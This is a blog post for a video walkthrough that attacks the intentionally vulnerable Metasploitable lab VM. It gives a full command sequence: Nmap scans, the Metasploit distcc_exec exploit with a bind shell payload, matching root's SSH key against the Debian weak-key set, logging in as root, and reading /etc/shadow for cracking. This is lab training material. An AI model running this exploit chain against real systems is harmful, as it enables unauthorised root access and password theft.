Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3826063
Download video: http://www.mediafire.com/?imgdyq4diwm
Download�(debian_ssh_rsa_2048_x86.tar.bz2): http://www.mediafire.com/?i2mnwymzt51
What is this?
This video demonstrates an attack on the DistCC service on the metasploitable hackable box.
“Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql.” – blog.metasploit.com
“distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. distcc should always generate the same results as a local build, is simple to install and use, and is usually much faster than a local compile”- distcc.samba.org
Guide
> Use�Nmap to�scan the network�(gathering information)
> Use�Nmap to do a more�detailed scan of the target�(gathering information)
> Use�Metasploit to send a�payload (remote access)
> *I cheated a little bit here as I had used�nessus in a previous scan to discover“Debian�OpenSSH/OpenSSL Package Random Number Generator�Weakness“*
> Via the�payload it is possible to capture the SSH Key and compare it against the weak keys�*Just like pWnOS* (escalating privileges)
> Connect via�SSH as root�(complete access)
> Prove complete access by cracking the�shadow file with�John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)
What do I need?
> Nmap —�on Backtrack 4 (Final)
> Metasploit —�on�Backtrack 4 (Final)
> SSH —�on�Backtrack 4 (Final)
> Weak SSH Keys�(debian_ssh_rsa_2048_x86.tar.bz2) —http://www.mediafire.com/?i2mnwymzt51
> Metasploitable.vmdk�(SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
> Metasploitable.part01.rar ~ http://www.mediafire.com/?dy2jl2wmw5h(SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
> Metasploitable.part02.rar ~�http://www.mediafire.com/?3zrz2wjmjmz(SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
> Metasploitable.part03.rar ~�http://www.mediafire.com/?nmjmyimmqwm(SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
> Metasploitable.part04.rar ~�http://www.mediafire.com/?gdjyzfjyjzm (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)
Commands :
nmap 192.168.1.1/24 nmap -sS -sV -p1-65535 -O -f -n -v 192.168.1.105 msfconsole search distcc use exploit/unix/misc/distcc_exec show options setg RHOST 192.168.1.105 show payloads setg payload generic/cmd/unix/bind_perl show options exploit ls whoami ls -lart/root ls -lart/root/ .ssh cat /root/.ssh/authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable Firefox www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 tar jxvf debian_ssh_rsa_2048_x86.tar.bz2 cd rsa/2048/ grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105 whoami hostname ifconfig cat /etc/shadow
Notes:
Song:�Josh Abrahams – Joker
Video length: 4:51
Capture length: 6:28
Blog Post:�http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-distcc.html
Forum Post:�http://www.backtrack-linux.org/forums/backtrack-videos/30079-%5Bvideo%5D-metasploitable-distcc.html#post167045
